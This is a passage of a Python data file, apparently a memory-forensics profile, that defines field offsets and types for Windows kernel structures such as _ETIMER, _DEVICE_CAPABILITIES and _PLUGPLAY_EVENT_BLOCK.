'SizeOfSegment' : [ 0x10, ['unsigned long long']],
'ExtendInfo' : [ 0x18, ['pointer', ['_MMEXTEND_INFO']]],
'BasedAddress' : [ 0x18, ['pointer', ['void']]],
'SegmentLock' : [ 0x1c, ['_EX_PUSH_LOCK']],
} ],
'_GDI_TEB_BATCH' : [ 0x4e0, {
'Offset' : [ 0x0, ['unsigned long']],
'HDC' : [ 0x4, ['unsigned long']],
'Buffer' : [ 0x8, ['array', 310, ['unsigned long']]],
} ],
'_MM_DRIVER_VERIFIER_DATA' : [ 0x84, {
'Level' : [ 0x0, ['unsigned long']],
'RaiseIrqls' : [ 0x4, ['unsigned long']],
'AcquireSpinLocks' : [ 0x8, ['unsigned long']],
'SynchronizeExecutions' : [ 0xc, ['unsigned long']],
'AllocationsAttempted' : [ 0x10, ['unsigned long']],
'AllocationsSucceeded' : [ 0x14, ['unsigned long']],
'AllocationsSucceededSpecialPool' : [ 0x18, ['unsigned long']],
'AllocationsWithNoTag' : [ 0x1c, ['unsigned long']],
'TrimRequests' : [ 0x20, ['unsigned long']],
'Trims' : [ 0x24, ['unsigned long']],
'AllocationsFailed' : [ 0x28, ['unsigned long']],
'AllocationsFailedDeliberately' : [ 0x2c, ['unsigned long']],
'Loads' : [ 0x30, ['unsigned long']],
'Unloads' : [ 0x34, ['unsigned long']],
'UnTrackedPool' : [ 0x38, ['unsigned long']],
'UserTrims' : [ 0x3c, ['unsigned long']],
'CurrentPagedPoolAllocations' : [ 0x40, ['unsigned long']],
'CurrentNonPagedPoolAllocations' : [ 0x44, ['unsigned long']],
'PeakPagedPoolAllocations' : [ 0x48, ['unsigned long']],
'PeakNonPagedPoolAllocations' : [ 0x4c, ['unsigned long']],
'PagedBytes' : [ 0x50, ['unsigned long']],
'NonPagedBytes' : [ 0x54, ['unsigned long']],
'PeakPagedBytes' : [ 0x58, ['unsigned long']],
'PeakNonPagedBytes' : [ 0x5c, ['unsigned long']],
'BurstAllocationsFailedDeliberately' : [ 0x60, ['unsigned long']],
'SessionTrims' : [ 0x64, ['unsigned long']],
'OptionChanges' : [ 0x68, ['unsigned long']],
'VerifyMode' : [ 0x6c, ['unsigned long']],
'PreviousBucketName' : [ 0x70, ['_UNICODE_STRING']],
'ActivityCounter' : [ 0x78, ['unsigned long']],
'PreviousActivityCounter' : [ 0x7c, ['unsigned long']],
'WorkerTrimRequests' : [ 0x80, ['unsigned long']],
} ],
'_VI_FAULT_TRACE' : [ 0x24, {
'Thread' : [ 0x0, ['pointer', ['_ETHREAD']]],
'StackTrace' : [ 0x4, ['array', 8, ['pointer', ['void']]]],
} ],
'_GENERIC_MAPPING' : [ 0x10, {
'GenericRead' : [ 0x0, ['unsigned long']],
'GenericWrite' : [ 0x4, ['unsigned long']],
'GenericExecute' : [ 0x8, ['unsigned long']],
'GenericAll' : [ 0xc, ['unsigned long']],
} ],
'_OBJECT_HANDLE_COUNT_DATABASE' : [ 0xc, {
'CountEntries' : [ 0x0, ['unsigned long']],
'HandleCountEntries' : [ 0x4, ['array', 1, ['_OBJECT_HANDLE_COUNT_ENTRY']]],
} ],
'_OWNER_ENTRY' : [ 0x8, {
'OwnerThread' : [ 0x0, ['unsigned long']],
'IoPriorityBoosted' : [ 0x4, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'OwnerReferenced' : [ 0x4, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'OwnerCount' : [ 0x4, ['BitField', dict(start_bit = 2, end_bit = 32, native_type='unsigned long')]],
'TableSize' : [ 0x4, ['unsigned long']],
} ],
'_MI_SECTION_CREATION_GATE' : [ 0x14, {
'Next' : [ 0x0, ['pointer', ['_MI_SECTION_CREATION_GATE']]],
'Gate' : [ 0x4, ['_KGATE']],
} ],
'_ETIMER' : [ 0x98, {
'KeTimer' : [ 0x0, ['_KTIMER']],
'TimerApc' : [ 0x28, ['_KAPC']],
'TimerDpc' : [ 0x58, ['_KDPC']],
'ActiveTimerListEntry' : [ 0x78, ['_LIST_ENTRY']],
'Lock' : [ 0x80, ['unsigned long']],
'Period' : [ 0x84, ['long']],
'ApcAssociated' : [ 0x88, ['unsigned char']],
'WakeReason' : [ 0x8c, ['pointer', ['_DIAGNOSTIC_CONTEXT']]],
'WakeTimerListEntry' : [ 0x90, ['_LIST_ENTRY']],
} ],
'_FREE_DISPLAY' : [ 0xc, {
'RealVectorSize' : [ 0x0, ['unsigned long']],
'Display' : [ 0x4, ['_RTL_BITMAP']],
} ],
'_POOL_BLOCK_HEAD' : [ 0x10, {
'Header' : [ 0x0, ['_POOL_HEADER']],
'List' : [ 0x8, ['_LIST_ENTRY']],
} ],
'__unnamed_1dc5' : [ 0x4, {
'Flags' : [ 0x0, ['_MMSECURE_FLAGS']],
'StartVa' : [ 0x0, ['pointer', ['void']]],
} ],
'_MMADDRESS_LIST' : [ 0x8, {
'u1' : [ 0x0, ['__unnamed_1dc5']],
'EndVa' : [ 0x4, ['pointer', ['void']]],
} ],
'_XSTATE_FEATURE' : [ 0x8, {
'Offset' : [ 0x0, ['unsigned long']],
'Size' : [ 0x4, ['unsigned long']],
} ],
'_ARBITER_INSTANCE' : [ 0x5ec, {
'Signature' : [ 0x0, ['unsigned long']],
'MutexEvent' : [ 0x4, ['pointer', ['_KEVENT']]],
'Name' : [ 0x8, ['pointer', ['unsigned short']]],
'OrderingName' : [ 0xc, ['pointer', ['unsigned short']]],
'ResourceType' : [ 0x10, ['long']],
'Allocation' : [ 0x14, ['pointer', ['_RTL_RANGE_LIST']]],
'PossibleAllocation' : [ 0x18, ['pointer', ['_RTL_RANGE_LIST']]],
'OrderingList' : [ 0x1c, ['_ARBITER_ORDERING_LIST']],
'ReservedList' : [ 0x24, ['_ARBITER_ORDERING_LIST']],
'ReferenceCount' : [ 0x2c, ['long']],
'Interface' : [ 0x30, ['pointer', ['_ARBITER_INTERFACE']]],
'AllocationStackMaxSize' : [ 0x34, ['unsigned long']],
'AllocationStack' : [ 0x38, ['pointer', ['_ARBITER_ALLOCATION_STATE']]],
'UnpackRequirement' : [ 0x3c, ['pointer', ['void']]],
'PackResource' : [ 0x40, ['pointer', ['void']]],
'UnpackResource' : [ 0x44, ['pointer', ['void']]],
'ScoreRequirement' : [ 0x48, ['pointer', ['void']]],
'TestAllocation' : [ 0x4c, ['pointer', ['void']]],
'RetestAllocation' : [ 0x50, ['pointer', ['void']]],
'CommitAllocation' : [ 0x54, ['pointer', ['void']]],
'RollbackAllocation' : [ 0x58, ['pointer', ['void']]],
'BootAllocation' : [ 0x5c, ['pointer', ['void']]],
'QueryArbitrate' : [ 0x60, ['pointer', ['void']]],
'QueryConflict' : [ 0x64, ['pointer', ['void']]],
'AddReserved' : [ 0x68, ['pointer', ['void']]],
'StartArbiter' : [ 0x6c, ['pointer', ['void']]],
'PreprocessEntry' : [ 0x70, ['pointer', ['void']]],
'AllocateEntry' : [ 0x74, ['pointer', ['void']]],
'GetNextAllocationRange' : [ 0x78, ['pointer', ['void']]],
'FindSuitableRange' : [ 0x7c, ['pointer', ['void']]],
'AddAllocation' : [ 0x80, ['pointer', ['void']]],
'BacktrackAllocation' : [ 0x84, ['pointer', ['void']]],
'OverrideConflict' : [ 0x88, ['pointer', ['void']]],
'InitializeRangeList' : [ 0x8c, ['pointer', ['void']]],
'TransactionInProgress' : [ 0x90, ['unsigned char']],
'TransactionEvent' : [ 0x94, ['pointer', ['_KEVENT']]],
'Extension' : [ 0x98, ['pointer', ['void']]],
'BusDeviceObject' : [ 0x9c, ['pointer', ['_DEVICE_OBJECT']]],
'ConflictCallbackContext' : [ 0xa0, ['pointer', ['void']]],
'ConflictCallback' : [ 0xa4, ['pointer', ['void']]],
'PdoDescriptionString' : [ 0xa8, ['array', 336, ['wchar']]],
'PdoSymbolicNameString' : [ 0x348, ['array', 672, ['unsigned char']]],
'PdoAddressString' : [ 0x5e8, ['array', 1, ['wchar']]],
} ],
'_KDEVICE_QUEUE_ENTRY' : [ 0x10, {
'DeviceListEntry' : [ 0x0, ['_LIST_ENTRY']],
'SortKey' : [ 0x8, ['unsigned long']],
'Inserted' : [ 0xc, ['unsigned char']],
} ],
'__unnamed_1e1e' : [ 0x4, {
'UserData' : [ 0x0, ['unsigned long']],
'Next' : [ 0x0, ['unsigned long']],
} ],
'__unnamed_1e20' : [ 0x8, {
'Last' : [ 0x0, ['unsigned long']],
'u' : [ 0x4, ['__unnamed_1e1e']],
} ],
'__unnamed_1e22' : [ 0x4, {
'u' : [ 0x0, ['__unnamed_1e1e']],
} ],
'__unnamed_1e24' : [ 0x8, {
'OldCell' : [ 0x0, ['__unnamed_1e20']],
'NewCell' : [ 0x0, ['__unnamed_1e22']],
} ],
'_HCELL' : [ 0xc, {
'Size' : [ 0x0, ['long']],
'u' : [ 0x4, ['__unnamed_1e24']],
} ],
'_HMAP_TABLE' : [ 0x2000, {
'Table' : [ 0x0, ['array', 512, ['_HMAP_ENTRY']]],
} ],
'_PROC_PERF_CONSTRAINT' : [ 0x24, {
'Prcb' : [ 0x0, ['pointer', ['_KPRCB']]],
'PerfContext' : [ 0x4, ['unsigned long']],
'PercentageCap' : [ 0x8, ['unsigned long']],
'ThermalCap' : [ 0xc, ['unsigned long']],
'TargetFrequency' : [ 0x10, ['unsigned long']],
'AcumulatedFullFrequency' : [ 0x14, ['unsigned long']],
'AcumulatedZeroFrequency' : [ 0x18, ['unsigned long']],
'FrequencyHistoryTotal' : [ 0x1c, ['unsigned long']],
'AverageFrequency' : [ 0x20, ['unsigned long']],
} ],
'_IMAGE_DATA_DIRECTORY' : [ 0x8, {
'VirtualAddress' : [ 0x0, ['unsigned long']],
'Size' : [ 0x4, ['unsigned long']],
} ],
'_DEVICE_CAPABILITIES' : [ 0x40, {
'Size' : [ 0x0, ['unsigned short']],
'Version' : [ 0x2, ['unsigned short']],
'DeviceD1' : [ 0x4, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'DeviceD2' : [ 0x4, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'LockSupported' : [ 0x4, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'EjectSupported' : [ 0x4, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'Removable' : [ 0x4, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'DockDevice' : [ 0x4, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'UniqueID' : [ 0x4, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'SilentInstall' : [ 0x4, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'RawDeviceOK' : [ 0x4, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'SurpriseRemovalOK' : [ 0x4, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'WakeFromD0' : [ 0x4, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'WakeFromD1' : [ 0x4, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'WakeFromD2' : [ 0x4, ['BitField', dict(start_bit = 12, end_bit = 13, native_type='unsigned long')]],
'WakeFromD3' : [ 0x4, ['BitField', dict(start_bit = 13, end_bit = 14, native_type='unsigned long')]],
'HardwareDisabled' : [ 0x4, ['BitField', dict(start_bit = 14, end_bit = 15, native_type='unsigned long')]],
'NonDynamic' : [ 0x4, ['BitField', dict(start_bit = 15, end_bit = 16, native_type='unsigned long')]],
'WarmEjectSupported' : [ 0x4, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long')]],
'NoDisplayInUI' : [ 0x4, ['BitField', dict(start_bit = 17, end_bit = 18, native_type='unsigned long')]],
'Reserved1' : [ 0x4, ['BitField', dict(start_bit = 18, end_bit = 19, native_type='unsigned long')]],
'Reserved' : [ 0x4, ['BitField', dict(start_bit = 19, end_bit = 32, native_type='unsigned long')]],
'Address' : [ 0x8, ['unsigned long']],
'UINumber' : [ 0xc, ['unsigned long']],
'DeviceState' : [ 0x10, ['array', -28, ['Enumeration', dict(target = 'long', choices = {0: 'PowerDeviceUnspecified', 1: 'PowerDeviceD0', 2: 'PowerDeviceD1', 3: 'PowerDeviceD2', 4: 'PowerDeviceD3', 5: 'PowerDeviceMaximum'})]]],
'SystemWake' : [ 0x2c, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'DeviceWake' : [ 0x30, ['Enumeration', dict(target = 'long', choices = {0: 'PowerDeviceUnspecified', 1: 'PowerDeviceD0', 2: 'PowerDeviceD1', 3: 'PowerDeviceD2', 4: 'PowerDeviceD3', 5: 'PowerDeviceMaximum'})]],
'D1Latency' : [ 0x34, ['unsigned long']],
'D2Latency' : [ 0x38, ['unsigned long']],
'D3Latency' : [ 0x3c, ['unsigned long']],
} ],
'_CACHED_KSTACK_LIST' : [ 0x18, {
'SListHead' : [ 0x0, ['_SLIST_HEADER']],
'MinimumFree' : [ 0x8, ['long']],
'Misses' : [ 0xc, ['unsigned long']],
'MissesLast' : [ 0x10, ['unsigned long']],
'Pad0' : [ 0x14, ['unsigned long']],
} ],
'__unnamed_1e37' : [ 0x18, {
'Length' : [ 0x0, ['unsigned long']],
'Alignment' : [ 0x4, ['unsigned long']],
'MinimumAddress' : [ 0x8, ['_LARGE_INTEGER']],
'MaximumAddress' : [ 0x10, ['_LARGE_INTEGER']],
} ],
'__unnamed_1e3b' : [ 0x14, {
'MinimumVector' : [ 0x0, ['unsigned long']],
'MaximumVector' : [ 0x4, ['unsigned long']],
'AffinityPolicy' : [ 0x8, ['unsigned short']],
'Group' : [ 0xa, ['unsigned short']],
'PriorityPolicy' : [ 0xc, ['Enumeration', dict(target = 'long', choices = {0: 'IrqPriorityUndefined', 1: 'IrqPriorityLow', 2: 'IrqPriorityNormal', 3: 'IrqPriorityHigh'})]],
'TargetedProcessors' : [ 0x10, ['unsigned long']],
} ],
'__unnamed_1e3d' : [ 0x8, {
'MinimumChannel' : [ 0x0, ['unsigned long']],
'MaximumChannel' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_1e3f' : [ 0xc, {
'Data' : [ 0x0, ['array', 3, ['unsigned long']]],
} ],
'__unnamed_1e41' : [ 0x10, {
'Length' : [ 0x0, ['unsigned long']],
'MinBusNumber' : [ 0x4, ['unsigned long']],
'MaxBusNumber' : [ 0x8, ['unsigned long']],
'Reserved' : [ 0xc, ['unsigned long']],
} ],
'__unnamed_1e43' : [ 0xc, {
'Priority' : [ 0x0, ['unsigned long']],
'Reserved1' : [ 0x4, ['unsigned long']],
'Reserved2' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1e45' : [ 0x18, {
'Length40' : [ 0x0, ['unsigned long']],
'Alignment40' : [ 0x4, ['unsigned long']],
'MinimumAddress' : [ 0x8, ['_LARGE_INTEGER']],
'MaximumAddress' : [ 0x10, ['_LARGE_INTEGER']],
} ],
'__unnamed_1e47' : [ 0x18, {
'Length48' : [ 0x0, ['unsigned long']],
'Alignment48' : [ 0x4, ['unsigned long']],
'MinimumAddress' : [ 0x8, ['_LARGE_INTEGER']],
'MaximumAddress' : [ 0x10, ['_LARGE_INTEGER']],
} ],
'__unnamed_1e49' : [ 0x18, {
'Length64' : [ 0x0, ['unsigned long']],
'Alignment64' : [ 0x4, ['unsigned long']],
'MinimumAddress' : [ 0x8, ['_LARGE_INTEGER']],
'MaximumAddress' : [ 0x10, ['_LARGE_INTEGER']],
} ],
'__unnamed_1e4b' : [ 0x18, {
'Port' : [ 0x0, ['__unnamed_1e37']],
'Memory' : [ 0x0, ['__unnamed_1e37']],
'Interrupt' : [ 0x0, ['__unnamed_1e3b']],
'Dma' : [ 0x0, ['__unnamed_1e3d']],
'Generic' : [ 0x0, ['__unnamed_1e37']],
'DevicePrivate' : [ 0x0, ['__unnamed_1e3f']],
'BusNumber' : [ 0x0, ['__unnamed_1e41']],
'ConfigData' : [ 0x0, ['__unnamed_1e43']],
'Memory40' : [ 0x0, ['__unnamed_1e45']],
'Memory48' : [ 0x0, ['__unnamed_1e47']],
'Memory64' : [ 0x0, ['__unnamed_1e49']],
} ],
'_IO_RESOURCE_DESCRIPTOR' : [ 0x20, {
'Option' : [ 0x0, ['unsigned char']],
'Type' : [ 0x1, ['unsigned char']],
'ShareDisposition' : [ 0x2, ['unsigned char']],
'Spare1' : [ 0x3, ['unsigned char']],
'Flags' : [ 0x4, ['unsigned short']],
'Spare2' : [ 0x6, ['unsigned short']],
'u' : [ 0x8, ['__unnamed_1e4b']],
} ],
'_POP_THERMAL_ZONE' : [ 0x150, {
'Link' : [ 0x0, ['_LIST_ENTRY']],
'State' : [ 0x8, ['unsigned char']],
'Flags' : [ 0x9, ['unsigned char']],
'Mode' : [ 0xa, ['unsigned char']],
'PendingMode' : [ 0xb, ['unsigned char']],
'ActivePoint' : [ 0xc, ['unsigned char']],
'PendingActivePoint' : [ 0xd, ['unsigned char']],
'Throttle' : [ 0x10, ['long']],
'LastTime' : [ 0x18, ['unsigned long long']],
'SampleRate' : [ 0x20, ['unsigned long']],
'LastTemp' : [ 0x24, ['unsigned long']],
'PassiveTimer' : [ 0x28, ['_KTIMER']],
'PassiveDpc' : [ 0x50, ['_KDPC']],
'OverThrottled' : [ 0x70, ['_POP_ACTION_TRIGGER']],
'Irp' : [ 0x80, ['pointer', ['_IRP']]],
'Info' : [ 0x84, ['_THERMAL_INFORMATION_EX']],
'InfoLastUpdateTime' : [ 0xe0, ['_LARGE_INTEGER']],
'Metrics' : [ 0xe8, ['_POP_THERMAL_ZONE_METRICS']],
} ],
'_MMPTE_LIST' : [ 0x4, {
'Valid' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'OneEntry' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'filler0' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 10, native_type='unsigned long')]],
'Prototype' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'filler1' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'NextEntry' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 32, native_type='unsigned long')]],
} ],
'_VI_POOL_PAGE_HEADER' : [ 0xc, {
'NextPage' : [ 0x0, ['pointer', ['_SINGLE_LIST_ENTRY']]],
'VerifierEntry' : [ 0x4, ['pointer', ['void']]],
'Signature' : [ 0x8, ['unsigned long']],
} ],
'_HANDLE_TRACE_DEBUG_INFO' : [ 0x80, {
'RefCount' : [ 0x0, ['long']],
'TableSize' : [ 0x4, ['unsigned long']],
'BitMaskFlags' : [ 0x8, ['unsigned long']],
'CloseCompactionLock' : [ 0xc, ['_FAST_MUTEX']],
'CurrentStackIndex' : [ 0x2c, ['unsigned long']],
'TraceDb' : [ 0x30, ['array', 1, ['_HANDLE_TRACE_DB_ENTRY']]],
} ],
'_CM_WORKITEM' : [ 0x14, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'Private' : [ 0x8, ['unsigned long']],
'WorkerRoutine' : [ 0xc, ['pointer', ['void']]],
'Parameter' : [ 0x10, ['pointer', ['void']]],
} ],
'_POP_THERMAL_ZONE_METRICS' : [ 0x68, {
'MetricsResource' : [ 0x0, ['_ERESOURCE']],
'ActiveCount' : [ 0x38, ['unsigned long']],
'PassiveCount' : [ 0x3c, ['unsigned long']],
'LastActiveStartTick' : [ 0x40, ['_LARGE_INTEGER']],
'AverageActiveTime' : [ 0x48, ['_LARGE_INTEGER']],
'LastPassiveStartTick' : [ 0x50, ['_LARGE_INTEGER']],
'AveragePassiveTime' : [ 0x58, ['_LARGE_INTEGER']],
'StartTickSinceLastReset' : [ 0x60, ['_LARGE_INTEGER']],
} ],
'_CM_TRANS' : [ 0x68, {
'TransactionListEntry' : [ 0x0, ['_LIST_ENTRY']],
'KCBUoWListHead' : [ 0x8, ['_LIST_ENTRY']],
'LazyCommitListEntry' : [ 0x10, ['_LIST_ENTRY']],
'KtmTrans' : [ 0x18, ['pointer', ['void']]],
'CmRm' : [ 0x1c, ['pointer', ['_CM_RM']]],
'KtmEnlistmentObject' : [ 0x20, ['pointer', ['_KENLISTMENT']]],
'KtmEnlistmentHandle' : [ 0x24, ['pointer', ['void']]],
'KtmUow' : [ 0x28, ['_GUID']],
'StartLsn' : [ 0x38, ['unsigned long long']],
'TransState' : [ 0x40, ['unsigned long']],
'HiveCount' : [ 0x44, ['unsigned long']],
'HiveArray' : [ 0x48, ['array', 7, ['pointer', ['_CMHIVE']]]],
} ],
'_WHEA_ERROR_RECORD_HEADER_VALIDBITS' : [ 0x4, {
'PlatformId' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Timestamp' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'PartitionId' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 32, native_type='unsigned long')]],
'AsULONG' : [ 0x0, ['unsigned long']],
} ],
'_CM_PARTIAL_RESOURCE_LIST' : [ 0x18, {
'Version' : [ 0x0, ['unsigned short']],
'Revision' : [ 0x2, ['unsigned short']],
'Count' : [ 0x4, ['unsigned long']],
'PartialDescriptors' : [ 0x8, ['array', 1, ['_CM_PARTIAL_RESOURCE_DESCRIPTOR']]],
} ],
'_RTL_RANGE_LIST' : [ 0x14, {
'ListHead' : [ 0x0, ['_LIST_ENTRY']],
'Flags' : [ 0x8, ['unsigned long']],
'Count' : [ 0xc, ['unsigned long']],
'Stamp' : [ 0x10, ['unsigned long']],
} ],
'_OBJECT_CREATE_INFORMATION' : [ 0x2c, {
'Attributes' : [ 0x0, ['unsigned long']],
'RootDirectory' : [ 0x4, ['pointer', ['void']]],
'ProbeMode' : [ 0x8, ['unsigned char']],
'PagedPoolCharge' : [ 0xc, ['unsigned long']],
'NonPagedPoolCharge' : [ 0x10, ['unsigned long']],
'SecurityDescriptorCharge' : [ 0x14, ['unsigned long']],
'SecurityDescriptor' : [ 0x18, ['pointer', ['void']]],
'SecurityQos' : [ 0x1c, ['pointer', ['_SECURITY_QUALITY_OF_SERVICE']]],
'SecurityQualityOfService' : [ 0x20, ['_SECURITY_QUALITY_OF_SERVICE']],
} ],
'_RTL_CRITICAL_SECTION_DEBUG' : [ 0x20, {
'Type' : [ 0x0, ['unsigned short']],
'CreatorBackTraceIndex' : [ 0x2, ['unsigned short']],
'CriticalSection' : [ 0x4, ['pointer', ['_RTL_CRITICAL_SECTION']]],
'ProcessLocksList' : [ 0x8, ['_LIST_ENTRY']],
'EntryCount' : [ 0x10, ['unsigned long']],
'ContentionCount' : [ 0x14, ['unsigned long']],
'Flags' : [ 0x18, ['unsigned long']],
'CreatorBackTraceIndexHigh' : [ 0x1c, ['unsigned short']],
'SpareUSHORT' : [ 0x1e, ['unsigned short']],
} ],
'_POOL_HACKER' : [ 0x28, {
'Header' : [ 0x0, ['_POOL_HEADER']],
'Contents' : [ 0x8, ['array', 8, ['unsigned long']]],
} ],
'_PO_DIAG_STACK_RECORD' : [ 0x8, {
'StackDepth' : [ 0x0, ['unsigned long']],
'Stack' : [ 0x4, ['array', 1, ['pointer', ['void']]]],
} ],
'_SECTION_OBJECT_POINTERS' : [ 0xc, {
'DataSectionObject' : [ 0x0, ['pointer', ['void']]],
'SharedCacheMap' : [ 0x4, ['pointer', ['void']]],
'ImageSectionObject' : [ 0x8, ['pointer', ['void']]],
} ],
'_VF_BTS_DATA_MANAGEMENT_AREA' : [ 0x34, {
'BTSBufferBase' : [ 0x0, ['pointer', ['void']]],
'BTSIndex' : [ 0x4, ['pointer', ['void']]],
'BTSMax' : [ 0x8, ['pointer', ['void']]],
'BTSInterruptThreshold' : [ 0xc, ['pointer', ['void']]],
'PEBSBufferBase' : [ 0x10, ['pointer', ['void']]],
'PEBSIndex' : [ 0x14, ['pointer', ['void']]],
'PEBSMax' : [ 0x18, ['pointer', ['void']]],
'PEBSInterruptThreshold' : [ 0x1c, ['pointer', ['void']]],
'PEBSCounterReset' : [ 0x20, ['array', 2, ['pointer', ['void']]]],
'Reserved' : [ 0x28, ['array', 12, ['unsigned char']]],
} ],
'_FLOATING_SAVE_AREA' : [ 0x70, {
'ControlWord' : [ 0x0, ['unsigned long']],
'StatusWord' : [ 0x4, ['unsigned long']],
'TagWord' : [ 0x8, ['unsigned long']],
'ErrorOffset' : [ 0xc, ['unsigned long']],
'ErrorSelector' : [ 0x10, ['unsigned long']],
'DataOffset' : [ 0x14, ['unsigned long']],
'DataSelector' : [ 0x18, ['unsigned long']],
'RegisterArea' : [ 0x1c, ['array', 80, ['unsigned char']]],
'Cr0NpxState' : [ 0x6c, ['unsigned long']],
} ],
'_SEP_AUDIT_POLICY' : [ 0x1c, {
'AdtTokenPolicy' : [ 0x0, ['_TOKEN_AUDIT_POLICY']],
'PolicySetStatus' : [ 0x1b, ['unsigned char']],
} ],
'__unnamed_1e88' : [ 0x4, {
'SnapSharedExportsFailed' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 32, native_type='unsigned long')]],
} ],
'__unnamed_1e8a' : [ 0xc, {
'AllSharedExportThunks' : [ 0x0, ['_VF_TARGET_ALL_SHARED_EXPORT_THUNKS']],
'Flags' : [ 0x0, ['__unnamed_1e88']],
} ],
'_VF_TARGET_DRIVER' : [ 0x18, {
'TreeNode' : [ 0x0, ['_VF_AVL_TREE_NODE']],
'u1' : [ 0x8, ['__unnamed_1e8a']],
'VerifiedData' : [ 0x14, ['pointer', ['_VF_TARGET_VERIFIED_DRIVER_DATA']]],
} ],
'__unnamed_1e92' : [ 0x14, {
'ClassGuid' : [ 0x0, ['_GUID']],
'SymbolicLinkName' : [ 0x10, ['array', 1, ['wchar']]],
} ],
'__unnamed_1e94' : [ 0x2, {
'DeviceIds' : [ 0x0, ['array', 1, ['wchar']]],
} ],
'__unnamed_1e96' : [ 0x2, {
'DeviceId' : [ 0x0, ['array', 1, ['wchar']]],
} ],
'__unnamed_1e98' : [ 0x8, {
'NotificationStructure' : [ 0x0, ['pointer', ['void']]],
'DeviceIds' : [ 0x4, ['array', 1, ['wchar']]],
} ],
'__unnamed_1e9a' : [ 0x4, {
'Notification' : [ 0x0, ['pointer', ['void']]],
} ],
'__unnamed_1e9c' : [ 0x8, {
'NotificationCode' : [ 0x0, ['unsigned long']],
'NotificationData' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_1e9e' : [ 0x8, {
'VetoType' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'PNP_VetoTypeUnknown', 1: 'PNP_VetoLegacyDevice', 2: 'PNP_VetoPendingClose', 3: 'PNP_VetoWindowsApp', 4: 'PNP_VetoWindowsService', 5: 'PNP_VetoOutstandingOpen', 6: 'PNP_VetoDevice', 7: 'PNP_VetoDriver', 8: 'PNP_VetoIllegalDeviceRequest', 9: 'PNP_VetoInsufficientPower', 10: 'PNP_VetoNonDisableable', 11: 'PNP_VetoLegacyDriver', 12: 'PNP_VetoInsufficientRights'})]],
'DeviceIdVetoNameBuffer' : [ 0x4, ['array', 1, ['wchar']]],
} ],
'__unnamed_1ea0' : [ 0x10, {
'BlockedDriverGuid' : [ 0x0, ['_GUID']],
} ],
'__unnamed_1ea2' : [ 0x2, {
'ParentId' : [ 0x0, ['array', 1, ['wchar']]],
} ],
'__unnamed_1ea4' : [ 0x20, {
'PowerSettingGuid' : [ 0x0, ['_GUID']],
'Flags' : [ 0x10, ['unsigned long']],
'SessionId' : [ 0x14, ['unsigned long']],
'DataLength' : [ 0x18, ['unsigned long']],
'Data' : [ 0x1c, ['array', 1, ['unsigned char']]],
} ],
'__unnamed_1ea6' : [ 0x20, {
'DeviceClass' : [ 0x0, ['__unnamed_1e92']],
'TargetDevice' : [ 0x0, ['__unnamed_1e94']],
'InstallDevice' : [ 0x0, ['__unnamed_1e96']],
'CustomNotification' : [ 0x0, ['__unnamed_1e98']],
'ProfileNotification' : [ 0x0, ['__unnamed_1e9a']],
'PowerNotification' : [ 0x0, ['__unnamed_1e9c']],
'VetoNotification' : [ 0x0, ['__unnamed_1e9e']],
'BlockedDriverNotification' : [ 0x0, ['__unnamed_1ea0']],
'InvalidIDNotification' : [ 0x0, ['__unnamed_1ea2']],
'PowerSettingNotification' : [ 0x0, ['__unnamed_1ea4']],
'PropertyChangeNotification' : [ 0x0, ['__unnamed_1e96']],
} ],
'_PLUGPLAY_EVENT_BLOCK' : [ 0x44, {
'EventGuid' : [ 0x0, ['_GUID']],
'EventCategory' : [ 0x10, ['Enumeration', dict(target = 'long', choices = {0: 'HardwareProfileChangeEvent', 1: 'TargetDeviceChangeEvent', 2: 'DeviceClassChangeEvent', 3: 'CustomDeviceEvent', 4: 'DeviceInstallEvent', 5: 'DeviceArrivalEvent', 6: 'VetoEvent', 7: 'BlockedDriverEvent', 8: 'InvalidIDEvent', 9: 'DevicePropertyChangeEvent', 10: 'DeviceInstanceRemovalEvent', 11: 'MaxPlugEventCategory'})]],
'Result' : [ 0x14, ['pointer', ['unsigned long']]],
'Flags' : [ 0x18, ['unsigned long']],
'TotalSize' : [ 0x1c, ['unsigned long']],
